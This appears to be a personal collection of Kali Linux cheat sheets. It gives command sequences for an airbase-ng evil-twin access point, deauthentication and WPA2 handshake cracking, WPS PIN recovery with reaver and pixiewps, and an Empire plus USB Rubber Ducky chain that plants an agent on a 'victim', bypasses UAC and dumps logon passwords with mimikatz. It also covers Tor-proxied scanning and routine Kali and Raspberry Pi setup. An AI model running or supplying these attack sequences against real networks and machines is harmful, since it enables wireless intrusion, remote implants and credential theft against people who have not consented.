Airbase-ng – Evil Twin

Check wifi interface

  • iwconfig

Turn up the power

  • iwconfig wlan0 txpower 27

Start wifi interface

  • airmon-ng start wlan0

Capture data & choose target AP

  • airodump-ng wlan0mon

Create Fake AP

  • airbase-ng wlan0mon -c 11 -a 20:34:67:24:89:76  -e FakeAP -v -z 2

Create Evil Twin AP

  • airbase-ng -a [victim AP MAC] -c 11-Z 4 --essid VictimAP wlan0mon

Monitor Evil Twin AP

  • airodump-ng --bssid [victim AP MAC] wlan0mon --channel 11 -w /root/Desktop/rougueap

Deauthentication

  • aireplay-ng -0 2 -a [router bssid] -c [Client MAC address] wlan0mon

Aircrack

  • aircrack-ng -b [victim AP MAC] -w /usr/share/wordlists/rockyou.txt rougue-01.cap

WPA2 + Aircrack-ng

  1. Show wifi interfaces
    1. airmon-ng
    2. airmon-ng check kill ( If wifi interface doesn’t show up correctly)
  2. Start wifi interface
    1. airmon-ng start wlan0
  3. Scan for wifi networks
    1. airodump-ng wlan0mon
  4. Choose wifi to test
    1. ctrl+c to stop scanning
    2. # airodump-ng -c 11 --bssid [router bssid] -w /root/Desktop/wpa2handshake.cap mon0
    3. # airodump-ng --ignore-negative-one --bssid [router bssid] -c 11 -w /root/Desktop/wpa2handshake.cap mon0 (Alternative method)
  5. DeAuth clients on victim AP
    1. # aireplay-ng -0 2 -a [router bssid] -c 40:A6:D9:1F:4A:D3(Client MAC address) mon0
    2. Wait for handshake to be captured
  6. Crack handshake
    1. # aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

Empire + Ducky

1. Create listener 
1a. (Empire) > listeners
1b. (Empire: listeners) > set Name Listener01
1c. (Empire: listeners) > execute
1d. (Empire: listeners) > back
2. Create ducky payload
2a. (Empire) > agents
2b. (Empire: agents) > usestager ducky 
2c. (Empire: stager/ducky) > set listener Listener01
2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt
2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky
3a. Generate inject.bin file from code in ducky.txt
at the Duck Toolkit site
3b. Copy inject.bin to Ducky
3c. Inject Ducky on victim
4. Try to extract login passwords from victim
4a. Wait for victim to connect back to Empire
4b. (Empire) > agents
4c. (Empire: agents) > list
4c. (Empire: agents) > interact FSDFSGAJ34FGH4
4d. (Empire: FSDFSGAJ34FGH4 ) > sysinfo
4e. (Empire: FSDFSGAJ34FGH4 ) > usemodule privesc/bypassuac
4f. (Empire: privesc/bypassuac ) > set Listener Listener01
4g. (Empire: privesc/bypassuac ) > run 
4h. (Empire: privesc/bypassuac ) > back * 2
4i. (Empire: agents) > list
4j. (Empire: agents) > interact DSGHFDFSGHJ243J
4k. (Empire: DSGHFDFSGHJ243J ) > usemodule credentials/
mimikatz/logonpasswords
4l. (Empire: credentials/mimikatz/logonpasswords ) > run

If succesful, logon passwords are now revealed in 
cleartext :)

Tor + proxychains + Kali

  1. Update Kali
    1. apt-get update
  2. Configure apt sources
    1. leafpad /etc/apt/sources.list
      1. add ‘deb http://deb.torproject.org/torproject.org wheezy main’
  3. Install Tor gpg keys
    1. gpg –keyserver keys.gnupg.net –recv 886DDD89
    2. gpg –export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add –
    3. apt-get update
    4. apt-get install deb.torproject.org-keyring
  4. Install Tor
    1. apt-get install tor
  5. Configure proxychains
    1. leafpad /etc/proxychains.conf
      1. uncomment ‘dynamic_chain’
      2. comment out ‘static_chain’
      3. add ‘socks5  127.0.0.1 9050’ at the end of the file
  6. Start Tor
    1. service tor start
  7. Execute proxychains
    1. proxychains nmap 1.2.3.4

Aircrack-ng + reaver + pixiewps

Prereqs:

  • Kali Linux
  • Do a “apt-get update && apt-get dist-upgrade -y” in your Kali Linux machine

1) Install reaver

r0ot@kali:~# apt-get install reaver aircrack-ng

2) Put your interface in monitor mode:

ro0t@kali:~# airmon-ng start wlan0

Note: You should now have a monitor interface named ‘wlan0mon

3) Identify AP in-scope for testing

ro0t@kali:~# airodump-ng wlan0mon –wps

Note: Identify in-scope AP mac address(BSSID) & channel it runs out of

4) Run reaver with gathered info 

roth@kali:~#  reaver -i wlan0mon -c 11 -b 12:34:56:78:90:12 -K 1

5) Behold pixiewps magic

You’re presented with WPS PSK wihin seconds, thanks Kali, reaver & pixiewps …that’s what a call an alliance of power

Scripts :: Kali

kali-wp-june-2014_1920x1080_A

KAAISv3 by rawstring

  • wget http://sourceforge.net/projects/kaais/files/kaaisv3.sh

netool.sh v4.3 by peterubuntu10

  • wget http://downloads.sourceforge.net/project/netoolsh/opensource%5Bkali%5D.tar.gz

Lazy Kali

https://code.google.com/p/lazykali/

  • wget https://lazykali.googlecode.com/files/lazykali.sh
  • wget https://lazykali.googlecode.com/files/hackpack.tar.gz

Pentesh.sh by phillips321.co.uk

  • svn checkout http://phillips321.googlecode.com/svn/trunk/ phillips321

Discover.sh by Lee Baird

  • git clone https://github.com/leebaird/discover.git

1st setup :: Kali

kali-wp-june-2014_1920x1080_A

Correct sources.list

nano /etc/apt/sources.list
add following to sources.list:

Regular repos
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free

Bleeding Edge repos
deb http://http.kali.org/kali kali-bleeding-edge contrib non-free main

# apt-get update
# apt-get upgrade

In VBox Environ

VBox Additions
1. apt-get update && apt-get install linux-headers-$(uname -r) -y
3. mount VBoxAdditions package
4. copy install package (VBoxLinuxAdditions.run) to /tmp
5. chmod 755 /tmp/VBoxLinuxAdditions.run
6. ./VBoxLinuxAdditions.run
7. logout or reboot guest machine

Update

  • apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y && reboot

 

Kali Pi :: Initial Setup

Raspi_Colour_R

Networking

[Static IP]
nano /etc/network/interfaces

Add following lines at the bottom of the file(comment out above lines except loopback iface):

auto eth0
allow-hotplug eth0
iface eth0 inet static
address 192.168.1.8
netmask 255.255.255.0
gateway 192.168.1.1

[DNS Conf]
nano /etc/resolv.conf
nameserver 192.168.1.1
nameserver 8.8.8.8

[Assign static default gateway]
ip route add default via 192.168.1.1

[Restart networking]
/etc/init.d/networking restart

Rebuild ssh keys
rm /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
service ssh restart

Expand USB
run /scripts/rpi-wiggle.sh

Update Kali
apt-get update && apt-get -y upgrade && apt-get -y dist-upgrade && apt-get autoremove && reboot

Check service status
service ssh status
service postgresql status
service apache2 status

Apps

– TightVNC
apt-get install tightvncserver
update-rc.d tightvncserver enable

[Reset password]
vncpasswd

– Metasploit
apt-get install metasploit-framework
update-rc.d metasploit-framework enable

-LazyKali
wget lazykali.googlecode.com/files/lazykali.sh
wget lazykali.googlecode.com/files/hackpack.tar.gz

Make services persistent
update-rc.d ssh enable
update-rc.d apache2 enable
update-rc.d postgresql enable
update-rc.d metasploit-framework enable

XFCE on Kali

xfce_logo

Install
apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies

Configure default x-session mngr
update-alternatives –config x-session-manager

Remove
apt-get remove xfce4 xfce4-places-plugin xfce4-goodies

Fix “Warning: gnome-keyring…” error
Edit /etc/xdg/autostart/gnome-keyring-pkcs11.desktop
and add ‘XFCE’ at the end of the OnlyShowIn line.